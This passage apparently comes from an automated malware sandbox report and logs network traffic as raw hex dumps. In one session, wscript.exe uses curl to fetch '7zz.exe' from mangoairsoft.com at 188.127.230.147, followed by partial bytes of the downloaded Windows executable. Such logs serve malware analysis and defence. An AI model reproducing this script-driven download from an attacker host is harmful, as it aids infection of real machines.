a4 49 69 45 21 50 1a a7 b7 2c 7a 52 10 36 19 16 98 e4 b4 df 74 5e 87 11 67 00 6b f3 85 5e Data Ascii: d@Mm/UB$`VaDa~u:%EP@pVx %@)+(j(L5(P$W)rqBqRUAR(bD5ERrAH;<N'EHJ*u(<,x m%tR+.zB !T(P80BU1})IiE!P,zR6t^gk^
2023-08-02 08:35:15 UTC	2673	IN	Data Raw: 2a e1 87 f2 d0 ca af 92 2a 29 2a f4 09 81 e6 53 4f df c0 f0 00 00 8c 0c 59 cd 19 40 bd 9b 9e ef 9b 73 db 9c 6d 5d cb da 09 09 e8 af 34 12 8e f5 06 7f 34 81 93 48 4d 42 9a a6 3c 4e a3 30 1e 69 fe 98 df ff 03 f9 09 f4 04 23 78 8a 09 b5 2c 81 12 12 2c 07 97 03 96 b6 14 2c cc c5 2d 24 d3 28 21 c1 19 48 00 25 b6 bd 88 fe e2 f6 7e 8a 82 82 6f 5b da ac 29 96 03 63 40 6f 45 50 01 a4 08 20 c2 31 31 21 90 62 45 38 11 90 13 66 28 c5 7b 91 d8 3b 90 83 51 a0 84 d1 82 90 0a 8b 0a 90 4c 02 09 49 16 53 9b 57 98 b5 9f e6 b5 59 51 18 02 e9 03 24 a5 6d 12 93 51 0a 30 48 60 a9 12 92 5b 04 64 69 fa 41 93 67 51 06 c8 49 43 24 81 c4 12 28 01 a0 d5 27 2d 33 7a cb 22 a3 f9 7f a3 28 0a 88 7a 6f 1e 95 3a b5 c9 96 26 40 a6 96 14 b7 81 5a 52 80 03 40 36 8e ed 25 21 07 58 29 0a 61 a7 Data Ascii: *)SOY@sm]44HMB<N0i#x,,,-$(!H%~o[)c@oEP 11!bE8f({;QLISWYQ$mQ0H`[diAgQIC$('-3z"(zo:&@ZR@6%!X)a
2023-08-02 08:35:15 UTC	2689	IN	Data Raw: eb 44 ac 41 e2 ee c9 0b c8 4c 0e fe 51 11 2f 67 73 16 41 11 78 bb 39 1c e6 4a fc 12 55 3d e5 2d 3b c6 68 cd a9 bc f0 8a 66 df 4b fe 74 51 00 af de e9 11 49 e0 5b 6d b6 6a fc cd 02 c4 c9 53 0a ca 3d df 42 cd 1b 02 44 88 8d 17 c5 c8 25 5b 1d 40 bc 40 f2 39 f6 e4 41 a4 c6 3e e4 bf 88 b9 5c 1b f6 10 e0 17 5f d2 fe 8a f0 b5 51 9e d6 61 b0 46 50 4c 54 64 45 5a d9 a6 3c c7 ed f9 08 08 02 bf b9 f6 d7 49 47 53 96 97 08 ec 33 3b 48 ca 7b 63 e7 64 b0 e2 8d 41 c8 f8 e4 a2 4e 2b 45 c2 eb 54 23 71 57 8e ec b6 f6 b9 12 b1 4f 43 1a 9a 05 68 6b 35 4e e0 32 57 6b 66 5b e4 b6 ef ee 2b 71 66 d2 6f 53 ba 44 f0 b5 04 37 a7 3c 01 36 c4 be 95 0c be 29 c9 33 22 9b de d2 27 68 c6 4b 9d 2d 04 2c f0 06 79 89 c4 0b 93 7c 66 b4 f0 37 2e f9 fc 92 39 dc f6 bc ad 67 b5 ef 0f 82 89 ec 27 Data Ascii: DALQ/gsAx9JU=-;hfKtQI[mjS=BD%[@@9A>\_QaFPLTdEZ<IGS3;H{cdAN+ET#qWOChk5N2Wkf[+qfoSD7<6)3"'hK-,y\|f7.9g'
2023-08-02 08:35:15 UTC	2705	IN	Data Raw: 84 05 29 13 be 99 1b 14 d7 69 be 54 dc 18 1e eb d6 c9 0b 09 e4 b2 a7 f2 c1 1a ba 27 b9 98 05 c4 1c 54 a9 06 77 c0 12 38 83 74 af 10 a3 37 29 d2 4c e4 16 e8 d4 87 6a 8b 71 c0 15 28 db 8f 7f 95 cd 58 c0 92 d1 f9 cc 81 b0 8d c2 d6 f9 62 3e 76 ce 07 ee 3b a6 4c 0a 81 c5 1a a3 f3 eb 1e 6f c3 9e d6 4a d2 04 ec 22 cd 6b 38 d5 8b e8 5f bf 52 26 1e 8e f9 8a bc 62 bb b3 a9 5c dd 66 ac d1 fb b0 7d 61 90 16 aa 04 4f 33 ad 0c 5a 51 db 3b 83 ef 93 fa 3d 2b fc ed f6 00 02 79 c8 dc 05 e9 42 4e 53 68 5c c5 3d d8 49 ad 39 46 8a 57 ad 6e f6 db b3 8a fc 7b e4 4c 04 c2 07 d6 4b 86 73 ac 58 5a 02 7e bd 9e b4 20 3c ef d1 22 6b fa 80 7e 95 38 39 69 8f d0 8c 95 ac b5 fe 89 8e cc 63 ff 53 cf 6a eb 51 ce db 17 a4 4e 1a cc 2f 08 7b 08 7c 6a 30 a2 e7 f0 5b 99 7d 07 de 5e 55 76 60 de Data Ascii: )iT'Tw8t7)Ljq(Xb>v;LoJ"k8_R&b\f}aO3ZQ;=+yBNSh\=I9FWn{LKsXZ~ <"k~89icSjQN/{\|j0[}^Uv`
2023-08-02 08:35:15 UTC	2721	IN	Data Raw: 45 08 12 62 eb 8e bf af 0e 6b 1e 55 b8 cd 93 14 70 bf 39 3e 86 4e 39 43 13 0b de 13 60 27 22 32 f2 51 74 e9 e1 e3 29 87 a7 29 03 00 64 39 3a 31 93 49 a5 ba 39 99 83 e5 18 2f c7 de e1 bd 1b f2 86 b8 6a ae ec 39 f7 04 79 61 e4 cf 3c d9 39 ee 29 81 cc ac 8f ca 1b de 91 3d f5 13 5f 04 f6 c6 21 54 f5 6d d7 63 c1 2a 47 ee d0 6a 2b 1a ed 08 a9 dc 0a 71 36 9c 57 57 7b ec 91 1a 04 e6 bd f8 fd 05 32 48 dd 20 4b 7e ae d7 fa 6c 45 f5 6b 0a 99 3a a4 57 55 42 5c c6 f5 0c 3e 11 27 d5 3b 6e 8c 94 f5 f2 f8 b5 fa 79 fb e9 26 ec 55 3a 17 93 a6 9c c9 31 82 23 4f 12 7b 31 e9 92 ac 4b 72 90 c8 ea 77 bf d1 94 9a 44 79 62 ea cd 60 90 cc 85 89 99 34 5f 7d 28 4d e0 fe e1 0a 9d a8 84 d6 56 3b d7 28 e9 44 d3 52 64 b5 67 7e 9d 56 98 b9 b0 cd 07 81 a8 3b bc 6a d1 b0 10 26 bd 43 56 04 Data Ascii: EbkUp9>N9C`'"2Qt))d9:1I9/j9ya<9)=_!Tmc*Gj+q6WW{2H K~lEk:WUB\>';ny&U:1#O{1KrwDyb`4_}(MV;(DRdg~V;j&CV
2023-08-02 08:35:15 UTC	2737	IN	Data Raw: 7c 29 7e dc ed 17 ed de e7 03 19 45 71 f5 b9 de 00 a7 6f 4a 3d d0 09 65 36 a4 64 59 bd d9 59 29 29 29 ea e6 ef 8b e5 ca 49 49 49 dd 19 f6 6c 33 5b 10 c4 69 87 24 25 1a 8d c8 32 4b e5 35 0a 95 1c f7 16 09 93 25 69 43 2b 41 36 84 63 d9 1c f7 d4 21 ea 81 e0 c2 39 85 55 6f 63 f1 e3 bf 50 20 4a 7d e9 9a 2d a4 9b be 57 dd 56 66 b7 ba 07 2d 3d 01 99 08 70 c7 e4 01 6a 39 b6 c2 e1 d2 23 50 df 31 95 3b 43 41 41 72 55 20 03 5b f8 e1 79 5b 40 8d 8a 98 6c 0a 29 a2 2b ba 47 0b 4e 92 b6 26 e3 6c cb 6a bf c8 92 a5 1f 42 b3 54 30 8a a1 7d 88 07 98 08 86 a5 ef 44 b3 09 71 06 52 8a 05 b5 b8 f6 62 f1 74 42 f4 fc ce bf 94 2e 10 3e 05 44 14 fc d2 86 8c 0d 8d 49 20 e4 12 c8 b1 ad 48 e0 89 e2 82 84 75 27 dd 8e 4d 28 9c e4 d9 bd 05 b7 b3 43 56 9f a6 7c ac a6 f4 6c df 02 08 b9 2d Data Ascii: \|)~EqoJ=e6dYY)))IIIl3[i$%2K5%iC+A6c!9UocP J}-WVf-=pj9#P1;CAArU [y[@l)+GN&ljBT0}DqRbtB.>DI Hu'M(CV\|l-
2023-08-02 08:35:15 UTC	2753	IN	Data Raw: ff 7b 25 45 72 1b a5 70 cc 12 5c 70 67 60 1a 1e a2 04 cf 1e 93 cf cc 9d 44 ad 4d 6a bf 47 5c ff 20 b1 c6 63 3e 47 8c d5 2a af 9f b2 4d 1f 67 97 27 f8 51 3f db 7d 7b 72 33 e8 83 62 97 ce 0c 07 65 6e c5 ba a4 e1 8c 9f a1 8c 2d 53 01 e4 12 15 5c 19 af 17 d6 2f 4e 4f 8c 82 72 e2 4e 7c 1e b9 84 f7 09 07 4e 60 a3 98 4a 73 77 24 53 9d fc ba f5 90 1e 9c 39 e7 0c 05 b2 fa 67 96 d1 14 79 1d cf d0 94 d4 bd ee b3 fc 07 ad fc 4d 8d 9d 38 34 bc 43 ad 74 31 4e 76 08 5e 94 8a e1 de 0a 47 74 51 4a f3 7e 4a f4 77 40 93 06 9e c2 37 c7 f0 2c ec a2 a3 ca b4 ac c7 64 95 70 62 4f 9c 58 3c 47 5c 27 73 ed b2 7f 39 79 1b 47 e8 b0 2b bf 80 34 db 11 a4 18 0d c6 ac a7 7a 04 cc eb c0 78 01 91 5b bc 68 54 82 cc 7e 56 d7 f3 53 e5 1d a6 4d 87 2e 62 29 4a 12 c8 ca aa 7a 9b 13 dd 19 5b 85 Data Ascii: {%Erp\pg`DMjG\ c>G*Mg'Q?}{r3ben-S\/NOrN\|N`Jsw$S9gyM84Ct1Nv^GtQJ~Jw@7,dpbOX<G\'s9yG+4zx[hT~VSM.b)Jz[
2023-08-02 08:35:15 UTC	2769	IN	Data Raw: c6 ce f7 a9 f2 5c b5 5d 5c ae 47 e8 0c 68 0e cc ea c9 38 fa b5 52 54 50 c6 90 c6 7a 2d 6f a1 d5 55 99 88 88 16 8d e3 b1 ae dc c1 15 ed bf ad 12 1d 94 3e c3 a9 7f a2 25 bf d7 86 99 d8 a0 bb 99 20 38 b5 b0 d4 7c f8 59 65 88 20 08 8e 7a 54 de 0f 0f db cb 12 9d 3a ee e3 f0 5f 9d bf 66 db e6 fd ad 29 ed 5b 4d db 65 c9 46 5d 03 d2 30 2f 5e 46 25 0f c6 ff c1 79 53 22 25 20 b5 b9 50 fe bb 4e 1f cd 4d 2a 5b 68 39 d6 42 70 68 a0 1f 35 78 d1 87 6b d9 ab 6b 8f 19 c5 fe 1c aa c4 1d c6 0d ae 51 d2 60 f7 ac 48 f6 cd a9 56 16 37 37 f7 36 f5 8d b6 3e f7 61 19 a8 0f 37 01 8d 51 92 82 b4 c9 51 fd f7 21 8c eb d7 aa aa 4a bb f1 ba 51 64 4f 68 40 01 ee c6 c3 e8 ba d5 2b 07 56 4f 84 3a b5 38 cc 82 b6 48 82 00 82 8c 38 d9 b9 b1 36 ac 82 ed 66 45 f0 1f db 90 cb d6 db 00 8f c8 b3 Data Ascii: \]\Gh8RTPz-oU>% 8\|Ye zT:_f)[MeF]0/^F%yS"% PNM*[h9Bph5xkkQ`HV776>a7QQ!JQdOh@+VO:8H86fE
2023-08-02 08:35:15 UTC	2785	IN	Data Raw: 01 79 e4 71 bc 69 b4 8f 13 66 2e 37 6b f9 b7 bf 9b 02 0d 7f 5c fc 34 5e bc 88 68 7b 31 70 66 77 7a 33 7c a7 b1 93 a4 e4 1b bb ae 71 ce 8b f3 5a 66 99 2c 7a 28 7d 04 4c 96 c4 e4 72 17 5d 2d a7 72 e8 7b 61 d8 0b d8 c9 42 f7 69 26 46 a6 13 e4 34 41 e1 32 07 c0 33 00 e4 81 c9 c3 10 8e 81 2f 15 7c 6c 42 c7 26 1c 12 70 08 c7 23 04 87 10 1c 61 f2 13 38 cb 83 f7 85 8b da ca 7d ba 5b 83 2c 31 a3 76 7e d2 2f cb 59 74 92 dc 5f f1 b7 3b 71 3b 4d 8d d3 5e c3 08 1b f2 e0 18 dc 04 ca 4f f0 89 0b 69 fa d4 fe 52 5f 46 bf fd 95 1c ad 90 9d 55 a5 3b 75 ec 40 49 50 9a 76 5d 62 0c 18 03 b6 e4 32 60 3b 70 19 03 e1 92 84 5c ce a3 6b e5 02 8e c0 30 38 82 41 1c 17 4e 2d a2 70 84 ae 3a 99 7c 80 b1 a3 24 e5 b8 ba d7 93 c2 94 6e 30 18 5c 83 dc 87 ca 19 95 f2 70 e5 c1 70 86 60 38 87 Data Ascii: yqif.7k\4^h{1pfwz3\|qZf,z(}Lr]-r{aBi&F4A23/\|lB&p#a8}[,1v~/Yt_;q;M^OiR_FU;u@IPv]b2`;p\k08AN-p:\|$n0\pp`8
2023-08-02 08:35:15 UTC	2801	IN	Data Raw: 60 20 5c 3c 64 2a ab 3e 71 69 91 b5 e9 09 d4 ea fa 90 e0 e7 43 45 de ec 3f 6d 0f 5d 3f 29 7a cf 57 1d a6 95 99 1c 66 0a 57 f3 6c a7 f7 d9 7e 20 c7 e7 39 68 b2 07 78 9b ef df 67 91 91 cc bb 5e 12 ff f3 64 19 2d ce b5 1d 26 fb 9b f2 5c 1f 5a 68 af 8f e5 7a 47 4e 0b b3 56 e6 57 d6 3c 9d 92 9b e6 84 3e 14 e7 3b ee e3 fd 2b 99 ee cd 57 af 56 6a 22 55 4a 28 da 55 02 f3 0c a9 75 3c b2 46 8d bf 45 86 25 f2 37 19 60 06 32 b7 80 cc 04 aa 35 20 38 04 b5 bc cc f3 22 36 e0 7f 7f ee 33 92 0d 0f ca 11 e3 a1 a6 fd 5c 3e 3f 70 1f 5f 1d cd a4 f2 41 48 07 4a 4f c2 05 0b 51 6e 16 64 4c 12 54 ec 7c 3d b3 09 e8 18 4b 55 a3 89 25 82 d7 eb 0b a9 41 cd 7d 65 39 8d 95 49 29 59 bd 2f 08 33 b0 c1 ba 35 59 a7 5c bd 9e f7 b4 26 8e 02 35 b2 17 d6 ca ce 56 5c ca a1 1a a5 98 90 d2 ef e3 Data Ascii: ` \<d*>qiCE?m]?)zWfWl~ 9hxg^d-&\ZhzGNVW<>;+WVj"UJ(Uu<FE%7`25 8"63\>?p_AHJOQndLT\|=KU%A}e9I)Y/35Y\&5V\
2023-08-02 08:35:15 UTC	2817	IN	Data Raw: da e3 50 bb df 8f 07 22 f2 0f 21 ed 0d bd 46 f2 7b 16 02 ee df ad 09 94 a3 93 b1 9b 6b d9 e3 2c a7 9b de 8a ba 2f 22 6f 2a 99 7d ef 2c 4f 46 d3 ac 0c 6e 3c bc be b1 ad 44 95 56 4b f6 4b 0c 31 3c 00 26 a1 f2 7b dd f0 2c 52 5d ba 92 02 7e d6 fb 94 2b 54 b7 cd 0a 4c d0 96 24 40 a9 7f 81 0f a2 4b 7b b0 ec 93 f2 b3 a7 83 e4 d1 d7 43 72 66 42 1d 2b a5 df a0 ff df c0 10 2b 02 64 d0 a3 bb ca fa 4f 7e 6b eb 3e 2d 06 e2 b3 73 fc fa 57 cd 20 cd 48 7a 42 72 ad fd 3b bd 1f d6 90 21 4a 0a ec 32 13 eb eb 0d 0d cb 66 b5 79 29 0c ce 95 b4 29 a1 00 c6 ed 8f 7c 7e 20 e4 9b 5a 0c cd 6b c4 cb 57 8c 6f 76 9a 4a 80 37 4c 3c 95 54 b4 f7 d5 00 d4 07 3c 90 72 34 b5 8d bc 30 7a fb 25 29 db 46 e2 69 fa c3 a6 a9 62 39 06 2a d8 b7 96 3b 92 e0 c4 fb 85 b7 b7 a4 4d 33 1d e6 2f 89 bf de Data Ascii: P"!F{k,/"o},OFn<DVKK1<&{,R]~+TL$@K{CrfB++dO~k>-sW HzBr;!J2fy))\|~ ZkWovJ7L<T<r40z%)Fib9;M3/

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49695	188.127.230.147	443	C:\Windows\System32\wscript.exe

Timestamp	kBytes transferred	Direction	Data
2023-08-02 08:35:16 UTC	2830	OUT	GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1 Host: mangoairsoft.com User-Agent: curl/7.55.1 Accept: /
2023-08-02 08:35:16 UTC	2831	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 02 Aug 2023 08:35:16 GMT Content-Type: application/x-msdos-program Content-Length: 587776 Connection: close Last-Modified: Tue, 25 Jul 2023 11:24:55 GMT ETag: "8f800-6014dfb053871" Accept-Ranges: bytes
2023-08-02 08:35:16 UTC	2831	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d 11 72 52 39 70 1c 01 39 70 1c 01 39 70 1c 01 42 6c 10 01 3b 70 1c 01 ba 6c 12 01 20 70 1c 01 0f 56 16 01 5b 70 1c 01 b7 78 43 01 38 70 1c 01 39 70 1d 01 96 70 1c 01 ba 78 41 01 3e 70 1c 01 0f 56 17 01 84 70 1c 01 56 06 b6 01 19 70 1c 01 56 06 82 01 3b 70 1c 01 fe 76 1a 01 38 70 1c 01 52 69 63 68 39 70 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}rR9p9p9pBl;pl pV[pxC8p9ppxA>pVpVpV;pv8pRich9pPEL
2023-08-02 08:35:16 UTC	2847	IN	Data Raw: 3b 00 00 f6 44 24 08 01 74 07 56 e8 16 2f 00 00 59 8b c6 5e c2 04 00 b8 9c 30 47 00 e8 7d 6d 06 00 83 ec 10 53 56 57 8b f9 33 f6 8b da 6a 03 8d 4d e4 89 75 f0 89 75 e4 89 75 e8 89 75 ec e8 65 d3 ff ff 8d 55 e4 8b cb 89 75 fc e8 a5 4b 00 00 8d 45 e4 8b cf 50 e8 73 ee ff ff ff 75 e4 e8 c3 2e 00 00 59 8b c7 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c3 53 56 8b f1 33 db 6a 03 8d 4e 10 88 1e 88 5e 01 88 5e 02 88 5e 03 88 5e 04 89 5e 08 89 5e 0c 89 19 89 59 04 89 59 08 e8 07 d3 ff ff 89 5e 20 89 5e 24 89 5e 28 c7 46 2c 04 00 00 00 c7 46 1c 78 a6 47 00 8b c6 5e 5b c3 b8 be 30 47 00 e8 d7 6c 06 00 51 56 8b f1 57 33 ff 8d 4e 04 89 3e 6a 03 89 75 f0 89 39 89 79 04 89 79 08 e8 c3 d2 ff ff 8d 4e 10 6a 03 89 7d fc 89 39 89 79 04 89 79 08 e8 ae d2 ff ff 8d 4e 1c 6a 03 Data Ascii: ;D$tV/Y^0G}mSVW3jMuuuueUuKEPsu.YM_^[dSV3jN^^^^^^YY^ ^$^(F,FxG^[0GlQVW3N>ju9yyNj}9yyNj
2023-08-02 08:35:16 UTC	2863	IN	Data Raw: d8 c1 e3 02 8b 45 08 8b 40 0c 8b 14 18 8b 46 0c 8b 0c b8 e8 94 fe ff ff 84 c0 74 09 47 83 c3 04 3b 7e 08 7c df 8b 56 08 3b fa 74 15 8b 45 0c 40 3b 45 fc 89 45 0c 7e c1 32 c0 5f 5e 5b c9 c2 08 00 b0 01 eb f5 56 57 8b f1 33 ff 39 7e 18 7e 1c 8b 46 1c 8b 54 24 0c 8b 04 b8 8d 48 04 e8 c8 fc ff ff 85 c0 74 0e 47 3b 7e 18 7c e4 83 c8 ff 5f 5e c2 04 00 8b c7 eb f7 80 7c 24 04 00 ff 74 24 08 74 05 83 c1 24 eb 03 83 c1 38 e8 48 08 00 00 c2 08 00 b8 5c 38 47 00 e8 01 2d 06 00 83 ec 4c 53 56 57 8b 7d 0c 8b f1 8b 47 08 83 f8 01 7e 5f 8b 47 0c 8b 18 8b cb 89 5d 0c e8 8a fe ff ff 84 c0 75 4c 53 8b ce e8 7a ff ff ff 8b d8 85 db 7d 27 56 8d 4d a8 ff 75 0c e8 4e 00 00 00 83 65 fc 00 50 8d 4e 10 e8 6e 07 00 00 83 4d fc ff 8d 4d a8 8b d8 e8 90 cc ff ff 8b 07 6a 01 6a 00 8b Data Ascii: E@FtG;~\|V;tE@;EE~2_^[VW39~~FT$HtG;~\|_^\|$t$t$8H\8G-LSVW}G~_G]uLSz}'VMuNePNnMMjj
2023-08-02 08:35:16 UTC	2879	IN	Data Raw: 57 e8 14 30 00 00 85 c0 89 46 08 74 08 33 c0 eb 0d 83 66 08 00 01 7e 10 8b c7 83 56 14 00 5f 5e c2 04 00 83 e9 00 74 2c 49 74 25 49 74 1c 83 e9 03 74 11 83 e9 05 74 06 b8 05 40 00 80 c3 b8 04 40 00 80 c3 b8 57 00 07 80 c3 b8 0e 00 07 80 c3 6a 01 58 c3 33 c0 c3 8b c1 8b 4c 24 04 83 60 0c 00 89 48 08 c7 00 66 cb 40 00 c7 40 04 ac cb 40 00 c2 04 00 55 8b ec 53 56 57 8b 7d 08 8b f1 b8 00 00 00 80 8b 0f 3b c8 89 4d 08 72 03 89 45 08 8b 46 08 8d 5d 08 53 ff 75 08 8b 08 52 50 ff 51 0c 89 46 0c 8b 45 08 89 07 8b 46 0c f7 d8 1b c0 5f 5e 83 e0 08 5b 5d c2 04 00 55 8b ec 51 51 8b 45 08 56 57 8b f9 33 c9 8b f2 2b c1 74 12 48 74 0c 48 74 05 6a 05 58 eb 34 6a 02 eb 02 6a 01 59 53 8b 47 08 8d 5d f8 8b 10 53 51 ff 76 04 ff 36 50 ff 52 10 89 47 0c 8b 45 f8 89 06 8b 45 fc Data Ascii: W0Ft3f~V_^t,It%Ittt@@WjX3L$`Hf@@@USVW};MrEF]SuRPQFEF_^[]UQQEVW3+tHtHtjX4jjYSG]SQv6PRGEE
2023-08-02 08:35:16 UTC	2895	IN	Data Raw: ff 75 fc 8b cf 56 ff 75 08 e8 8d 84 ff ff 5f 5e c9 c2 08 00 b8 ac 41 47 00 e8 80 ad 05 00 83 ec 1c 53 56 57 8b 7d 08 8b d9 6a 01 8b 47 08 89 55 f0 3b c3 5e 75 34 80 7d 10 00 75 2e ff 35 18 ba 48 00 8d 4d e4 e8 f6 29 ff ff ff 75 0c 8b 4d f0 83 65 fc 00 8d 55 e4 56 e8 7a ff ff ff 83 4d fc ff ff 75 e4 e8 bd 6e ff ff 59 3b 5f 08 7d 6a 8b 47 0c 8b 0c 98 83 79 04 00 74 48 8b 01 66 83 38 40 75 2f 8d 45 d8 56 50 e8 4a 67 ff ff ff 75 14 8b 00 8b 4d f0 8b d0 ff 75 0c 89 75 fc 56 e8 47 00 00 00 83 4d fc ff ff 75 d8 e8 77 6e ff ff 59 eb 0e ff 75 0c 8b d1 8b 4d f0 56 e8 17 ff ff ff 43 eb a7 a1 38 ba 48 00 68 58 d3 47 00 89 45 10 8d 45 10 50 e8 29 ad 05 00 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 b8 c8 41 47 00 e8 aa ac 05 00 83 ec 18 53 56 57 33 f6 bf 20 a4 Data Ascii: uVu_^AGSVW}jGU;^u4}u.5HM)uMeUVzMunY;_}jGytHf8@u/EVPJguMuuVGMuwnYuMVC8HhXGEEP)M_^[dAGSVW3
2023-08-02 08:35:16 UTC	2911	IN	Data Raw: 00 60 00 8b c3 8b de 8b f2 55 99 6a 03 03 d8 55 57 13 f2 e8 66 68 05 00 6a 01 59 e8 ce 67 05 00 03 d8 13 f2 5f 8b d6 5e 8b c3 5d 5b 59 c3 53 8a 5c 24 08 56 8b f1 f6 c3 02 74 24 57 8d 7e fc 68 b4 29 44 00 ff 37 6a 18 56 e8 27 73 05 00 f6 c3 01 74 07 57 e8 cd 2e ff ff 59 8b c7 5f eb 15 8b ce e8 5c de 02 00 f6 c3 01 74 07 56 e8 b5 2e ff ff 59 8b c6 5e 5b c2 04 00 b8 80 47 47 00 e8 1b 6d 05 00 83 ec 1c 53 33 db 56 57 89 5d e0 c7 45 d8 cc aa 47 00 68 00 05 00 00 8d 4d d8 89 5d fc e8 88 f0 ff ff 84 c0 0f 84 80 00 00 00 8b 75 e0 33 c0 ba 00 01 00 00 88 04 30 40 3b c2 72 f8 8b ce e8 8b 00 00 00 3d 73 8c 05 29 75 60 8d 45 e4 ba 00 04 00 00 50 8d 8e 00 01 00 00 c7 45 e4 e5 55 9a 15 c7 45 e8 b5 3b 12 1f e8 93 00 00 00 89 5d ec 8b 45 ec 83 65 f0 00 8d 3c 30 8b 55 f0 Data Ascii: `UjUWfhjYg_^][YS\$Vt$W~h)D7jV'stW.Y_\tV.Y^[GGmS3VW]EGhM]u30@;r=s)u`EPEUE;]Ee<0U
2023-08-02 08:35:16 UTC	2927	IN	Data Raw: ff 75 d0 8b f0 e8 1c ef fe ff ff 75 dc e8 14 ef fe ff ff 75 c4 e8 0c ef fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b c6 e9 65 01 00 00 ff 75 1c 8d 45 b8 8d 4d c4 50 e8 63 e8 fe ff 50 8d 4d dc c6 45 fc 05 e8 e3 92 fe ff ff 75 b8 c6 45 fc 04 e8 c9 ee fe ff 59 8d 45 b8 ff 75 1c 8d 4d c4 50 e8 6a e7 fe ff 50 8d 4d d0 c6 45 fc 06 e8 ba 92 fe ff ff 75 b8 c6 45 fc 04 e8 a0 ee fe ff 59 8d 45 d0 50 8d 45 dc 50 8b ce e8 a5 02 00 00 eb 10 8b 45 18 8b 56 08 8b 08 8d 46 08 51 50 ff 52 0c ff 75 f0 8b cf ff 75 18 ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a1 f9 ff ff 3b c3 89 45 18 74 34 ff 75 d0 e8 56 ee fe ff ff 75 dc e8 4e ee fe ff ff 75 c4 e8 46 ee fe ff 8b 45 f0 83 4d fc ff 83 c4 0c 3b c3 74 06 8b 08 50 ff 51 08 8b 45 18 e9 9e 00 00 00 8d 45 d0 Data Ascii: uuuEM;tPQeuEMPcPMEuEYEuMPjPMEuEYEPEPEVFQPRuuuuuu;Et4uVuNuFEM;tPQEE
2023-08-02 08:35:16 UTC	2943	IN	Data Raw: 74 07 8b 10 51 8b c8 ff 12 ff 45 f8 83 45 fc 0c 8b 45 f8 3b 43 08 0f 8c 77 ff ff ff 8b 4d 08 e8 1a bc fe ff 5f 5e 5b c9 c2 08 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 f0 8d 45 f0 50 e8 c1 ed 04 00 a1 e8 c3 48 00 68 58 d3 47 00 89 45 ec 8d 45 ec 50 e8 ab ed 04 00 8b 44 24 08 83 f8 01 72 07 b8 57 00 07 80 eb 2b 8b 54 24 10 8d 04 40 8b 0c 85 1c c4 48 00 8d 04 85 18 c4 48 00 89 0a 8b 4c 24 14 66 8b 40 08 66 89 01 8b 44 24 0c 83 20 00 33 c0 c2 14 00 b8 28 56 47 00 e8 ff ec 04 00 83 ec 10 33 c9 66 89 4d e4 66 89 4d e6 83 7d 0c 2c 89 4d fc 75 16 8b 45 08 38 48 30 74 0e ff 70 24 8d 4d e4 ff 70 20 e8 03 f6 fe ff ff 75 10 8d 4d e4 e8 ea f6 fe ff 83 4d fc ff 8d 4d e4 e8 3b f6 fe ff 8b 4d f4 33 c0 64 89 0d 00 00 00 00 c9 c2 0c 00 b8 3c 56 47 00 e8 a2 ec 04 00 83 ec 10 Data Ascii: tQEEE;CwM_^[HhXGEEPHhXGEEPD$rW+T$@HHL$f@fD$ 3(VG3fMfM},MuE8H0tp$Mp uMMM;M3d<VG
2023-08-02 08:35:16 UTC	2959	IN	Data Raw: eb 12 48 48 e9 9d f8 ff ff b8 01 0b 42 00 c3 b8 0e 00 07 80 8b 4d f4 5f 5e 64 89 0d 00 00 00 00 5b c9 c2 10 00 b8 4c 5c 47 00 e8 6f ad 04 00 83 ec 34 53 56 8b f1 57 33 db 6a 03 8d 4d e4 89 5d f0 89 5d e4 89 5d e8 89 5d ec e8 59 13 fe ff 38 5e 18 8b 7e 10 89 5d fc 0f 84 4b 01 00 00 89 7d f0 4f 3b fb 7c 66 8b 46 0c 66 8b 1c 78 66 83 fb 7a 75 26 8d 45 e4 66 ba 61 00 50 8d 4d d8 e8 de 0b 00 00 50 8d 4d e4 c6 45 fc 01 e8 a4 12 fe ff 80 65 fc 00 ff 75 d8 eb 2a 66 83 fb 5a 75 63 8d 45 e4 66 ba 41 00 50 8d 4d cc e8 b2 0b 00 00 50 8d 4d e4 c6 45 fc 02 e8 78 12 fe ff 80 65 fc 00 ff 75 cc e8 5e 6e fe ff 4f 59 79 9a 8d 7e 0c 8d 45 e4 50 8b cf e8 5a 12 fe ff 8b 4d 08 57 8b d6 e8 c9 a4 fe ff ff 75 e4 e8 39 6e fe ff 8b 45 08 59 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 Data Ascii: HHBM_^d[L\Go4SVW3jM]]]]Y8^~]K}O;\|fFfxfzu&EfaPMPMEeu*fZucEfAPMPMExeu^nOYy~EPZMWu9nEYM_^[d
